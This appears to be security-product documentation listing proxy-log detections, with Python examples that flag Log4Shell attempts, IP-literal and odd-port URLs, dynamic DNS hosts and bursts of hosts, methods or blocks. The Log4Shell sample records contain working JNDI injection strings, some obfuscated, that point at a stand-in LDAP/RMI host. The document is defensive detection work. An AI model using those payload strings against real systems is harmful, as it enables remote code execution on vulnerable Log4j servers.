Proxy detections

A proxy server is a system or router that provides a gateway between users and the internet. Because the proxy is an intermediary that isolates the internal network from the internet, it helps organizations prevent attackers from reaching the private network directly. Proxies provide a valuable layer of security in general and an important data source for analyzing the web traffic going to and from your organization. Monitoring proxy data can help pinpoint attacks, reveal malicious behavior, and give more context about what entities are doing within your organization. The list of out-of-the-box detections below covers commonly seen use cases for potentially malicious activity visible in proxy logs.

This search looks for Collective Defense matches in proxy data.

Source table → proxy.all.access

Alert that checks for attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message. This includes payloads in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events because of the number of scanners currently testing systems on the Internet. It is therefore likely to need some tuning.

Source table → cloud.azure

During normal navigation by a user or system, URLs do not include the destination port. An explicit port in the URL can become suspicious behavior in combination with other factors.

Source table → proxy.all.access

The REvil ransomware has hit 40 service providers globally through multiple Kaseya VSA zero-days. The attack was pushed out via an infected IT management update from Kaseya.

Source table → proxy.all.access

A record flagged a destination host from a threat intelligence match list.

Source table → proxy.all.access

Access to several distinct hosts (domains) in a short period of time can be suspicious behavior that it is important to monitor and control.

Source table → proxy.all.access

Detects the download of a file with a single character filename.

Source table → proxy.all.access

HTTP defines a set of request methods to indicate the desired action to be performed on a given resource. It is necessary to monitor non-standard methods used in requests to web servers because they can be an indicator of an attack.

Source table → proxy.all.access

Detects users downloading high-risk files via requests without hostnames or referrers. Most legitimate downloads will have a valid hostname and referrer.

Source table → proxy.all.access

Dynamic DNS services are associated in several cases with malware and fraud campaigns. They can even be part of a content-filter bypass technique used by internal systems.

Source table → proxy.all.access

Alert that checks for attempts to exploit CVE-2021-44228, known as Log4Shell. The query looks for payload patterns associated with this vulnerability in the raw log message. This includes payloads in the URL, the User-Agent header, the Referer header, or POST and PUT HTTP bodies. [WARNING] This alert detects attack patterns and can generate a high volume of events because of the number of scanners currently testing systems on the Internet. It is therefore likely to need some tuning.

Source table → proxy.all.access
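The two Log4Shell alerts above match payload patterns in the URL, User-Agent, Referer and request body. The following is an added example (not code from this page or from the vendor's own alert) showing the detection logic those descriptions imply, run over a handful of constructed proxy records: each inspected field is URL-decoded and the common lookup-based obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) are unwrapped before the `${jndi:` marker is matched, so `${${lower:j}ndi:...}` and percent-encoded bodies are caught while a harmless `${version}` placeholder is not. Field names, the sample records and the `suppress_src` tuning knob are assumptions for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample proxy records for this example. The field names are an
# assumption, not the real proxy.all.access column names.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "url": "https://intranet.example.com/index.html",
     "user_agent": "Mozilla/5.0", "referer": "https://intranet.example.com/", "body": ""},
    {"src": "203.0.113.7", "url": "https://www.example.com/?q=${jndi:ldap://203.0.113.9:1389/a}",
     "user_agent": "curl/7.79", "referer": "", "body": ""},
    {"src": "203.0.113.8", "url": "https://www.example.com/",
     "user_agent": "${${lower:j}ndi:${lower:l}dap://203.0.113.9/x}", "referer": "", "body": ""},
    {"src": "203.0.113.9", "url": "https://www.example.com/login",
     "user_agent": "Mozilla/5.0", "referer": "",
     # percent-encoded form of: user=${${::-j}ndi:rmi://203.0.113.9/x}
     "body": "user=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.9%2Fx%7D"},
    {"src": "10.0.0.6", "url": "https://www.example.com/docs/${version}",
     "user_agent": "Mozilla/5.0", "referer": "", "body": ""},
]

# Lookup tricks used to hide the literal "jndi": ${lower:j}, ${upper:J},
# ${::-j} and ${env:NOSUCHVAR:-j} all evaluate to a single character.
WRAPPER_PATTERNS = [
    re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.I),
    re.compile(r"\$\{[^{}]*?:-([^{}])\}"),
]
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.I)
INSPECTED_FIELDS = ("url", "user_agent", "referer", "body")


def normalize(value, rounds=5):
    """URL-decode and unwrap lookup obfuscation until the string stops changing."""
    for _ in range(rounds):
        new = unquote(value)
        for pattern in WRAPPER_PATTERNS:
            new = pattern.sub(r"\1", new)
        if new == value:
            break
        value = new
    return value


def find_log4shell(records, suppress_src=frozenset()):
    """Return one finding per (record, field) whose decoded content carries a JNDI lookup."""
    findings = []
    for rec in records:
        if rec["src"] in suppress_src:      # tuning knob, e.g. sources known to be internet scanners
            continue
        for name in INSPECTED_FIELDS:
            text = normalize(rec.get(name, ""))
            m = JNDI_PATTERN.search(text)
            if m:
                findings.append({
                    "src": rec["src"], "field": name,
                    "scheme": (m.group(1) or "unknown").lower(),
                    "decoded": text[m.start():m.start() + 60],
                })
    return findings


if __name__ == "__main__":
    for f in find_log4shell(SAMPLE_RECORDS):
        print(f"{f['src']:<14} {f['field']:<10} {f['scheme']:<6} {f['decoded']}")
```

The decoded snippet and the JNDI scheme (ldap, rmi, dns, ...) are kept in the finding because they are what an analyst needs to decide whether the request was a scanner probe or a targeted attempt; the warning in the alert description about volume is what `suppress_src` is for.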

[Internal connection] Unauthenticated Arbitrary File Read in VMware vCenter before version 6.5u1.

Source table → proxy.all.access

Regular navigation uses domain names rather than server IP addresses. Using an IP address in the URL is suspicious behavior and is closely associated with malware.

Source table → proxy.all.access
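Several of the detections above (explicit port in the URL, threat-intelligence match on the destination host, single-character filename, non-standard HTTP method, high-risk download without hostname or referrer, dynamic DNS domain, and IP address in the URL) are per-request checks on the same few fields. The following is an added example, not the vendor's own queries, that evaluates all of them against constructed proxy records with Python's standard URL parsing. The field names, the risky-extension list, the dynamic DNS suffixes and the threat-intelligence hosts are illustrative assumptions; a deployment would load the lists from its own lookups and match lists.

```python
import ipaddress
import posixpath
from urllib.parse import urlsplit

# RFC 9110 / RFC 5789 request methods; anything else is treated as non-standard.
STANDARD_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "OPTIONS", "TRACE", "PATCH"}
# Illustrative lists only (assumptions for this example).
HIGH_RISK_EXT = {".exe", ".dll", ".scr", ".msi", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".jar", ".hta"}
DYNDNS_SUFFIXES = ("no-ip.org", "ddns.net", "duckdns.org", "dyndns.org", "hopto.org")
THREAT_INTEL_HOSTS = ("bad.example", "c2.evil.example")

# Constructed sample requests; field names are assumptions, not proxy.all.access columns.
SAMPLE_REQUESTS = [
    {"method": "GET", "url": "https://www.example.com/news/today.html", "referer": "https://www.example.com/"},
    {"method": "GET", "url": "http://198.51.100.23:8080/a.exe", "referer": ""},
    {"method": "PROPFIND", "url": "https://files.example.com/share/", "referer": ""},
    {"method": "GET", "url": "http://update.hopto.org/update.bin", "referer": ""},
    {"method": "GET", "url": "https://cdn.c2.evil.example/payload.js", "referer": "https://cdn.c2.evil.example/"},
    {"method": "GET", "url": "http://[2001:db8::1]/x", "referer": ""},
    {"method": "GET", "url": "https://notbad.example/", "referer": "https://www.example.com/"},
]


def host_matches(host, entries):
    """True if host equals an entry or is a subdomain of it (label boundary respected,
    so notbad.example does not match bad.example)."""
    host = host.lower().rstrip(".")
    return any(host == e or host.endswith("." + e) for e in entries)


def is_ip_literal(host):
    """True for IPv4 or IPv6 literals; urlsplit already strips IPv6 brackets."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_request(rec):
    """Return the names of the detections a single proxy record triggers."""
    hits = []
    parts = urlsplit(rec["url"])
    host = parts.hostname or ""
    stem, ext = posixpath.splitext(posixpath.basename(parts.path))
    try:
        port = parts.port
    except ValueError:          # malformed port string: still an explicit, and odd, port
        port = -1

    if is_ip_literal(host):
        hits.append("ip_in_url")
    if port is not None:
        hits.append("port_in_url")
    if rec["method"].upper() not in STANDARD_METHODS:
        hits.append("nonstandard_method")
    if len(stem) == 1:          # last path segment is a single character (with or without extension)
        hits.append("single_char_filename")
    if ext.lower() in HIGH_RISK_EXT and (not host or not rec.get("referer")):
        hits.append("risky_download_no_referer")
    if host_matches(host, DYNDNS_SUFFIXES):
        hits.append("dynamic_dns")
    if host_matches(host, THREAT_INTEL_HOSTS):
        hits.append("threat_intel_match")
    return hits


def scan(records):
    """Map each URL to the detections it triggers (empty list when clean)."""
    return {rec["url"]: check_request(rec) for rec in records}


if __name__ == "__main__":
    for url, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{url:<50} {', '.join(hits) or '-'}")
```

The checks are deliberately independent so that one request can raise several of them at once (an IP-literal host on a non-default port serving `a.exe` with no referrer is the classic stager download), which is exactly the "in combination with other factors" the port-in-URL description calls for.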

There are more than ten HTTP methods, but clients usually use only a few. If a client uses all of them, or a large number of methods, this could be reconnaissance, probing, or enumeration.

Source table → proxy.all.access

It is considered suspicious behavior when a user is blocked by the proxy server many times in a short period of time.

Source table → proxy.all.access
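Unlike the per-request checks, the "many distinct hosts in a short period", "many HTTP methods per client" and "many proxy blocks per user" detections are aggregations over a time window. The following is an added example, not the vendor's own query, of one sliding-window counter that serves all three: records are grouped by source, sorted by timestamp, and the largest count (distinct hosts, distinct methods, or total blocks) seen inside any window is compared with a threshold. The five-minute window, the thresholds, the field names and the constructed events are assumptions for this example.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumed window; tune per environment

# Assumed thresholds. key() returns the value to count for a record, or None
# to ignore the record for that rule.
RULES = {
    "many_distinct_hosts": {"key": lambda r: r["host"], "distinct": True, "threshold": 20},
    "many_http_methods":   {"key": lambda r: r["method"].upper(), "distinct": True, "threshold": 5},
    "many_proxy_blocks":   {"key": lambda r: "blocked" if r["action"] == "blocked" else None,
                            "distinct": False, "threshold": 10},
}


def group_by_source(records):
    """Group records by source and sort each group by timestamp."""
    by_src = defaultdict(list)
    for r in records:
        by_src[r["src"]].append((datetime.fromisoformat(r["ts"]), r))
    for events in by_src.values():
        events.sort(key=lambda e: e[0])
    return by_src


def max_in_window(events, window, key, distinct):
    """Slide `window` over time-sorted (ts, record) events and return the largest
    count seen together with the start timestamp of that window."""
    counts = Counter()
    left, best = 0, (0, None)
    for ts, rec in events:
        k = key(rec)
        if k is not None:
            counts[k] += 1
        while ts - events[left][0] > window:        # evict events older than the window
            old = key(events[left][1])
            if old is not None:
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
            left += 1
        current = len(counts) if distinct else sum(counts.values())
        if current > best[0]:
            best = (current, events[left][0])
    return best


def run_detections(records, window=WINDOW):
    """Return {rule_name: [(src, peak_count), ...]} for every source that crossed a threshold."""
    alerts = defaultdict(list)
    for src, events in group_by_source(records).items():
        for name, rule in RULES.items():
            count, _start = max_in_window(events, window, rule["key"], rule["distinct"])
            if count >= rule["threshold"]:
                alerts[name].append((src, count))
    return dict(alerts)


def build_sample_events():
    """Constructed proxy events for this example (not real traffic)."""
    base = datetime(2024, 1, 1, 9, 0, 0)
    rows = []

    def add(src, offset_s, host, method="GET", action="allowed"):
        rows.append({"ts": (base + timedelta(seconds=offset_s)).isoformat(),
                     "src": src, "host": host, "method": method, "action": action})

    for i in range(12):   # ordinary browsing: three hosts over ten minutes
        add("10.0.0.5", i * 50, ("www.example.com", "cdn.example.com", "mail.example.com")[i % 3])
    for i in range(25):   # 25 distinct hosts in two minutes
        add("10.0.0.9", i * 5, f"h{i}.example.net")
    for i, m in enumerate(("GET", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PROPFIND")):
        add("10.0.0.12", i * 8, "files.example.com", method=m)   # seven methods in one minute
    for i in range(12):   # twelve proxy blocks in three minutes
        add("10.0.0.20", i * 15, "blocked.example.org", action="blocked")
    return rows


if __name__ == "__main__":
    for rule, sources in run_detections(build_sample_events()).items():
        print(rule, sources)
```

Reporting the peak count rather than a boolean keeps the alert useful for triage: 25 hosts in five minutes from one workstation looks like a scripted scan or beaconing, while a source that sits just over the threshold may only need the threshold raised.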
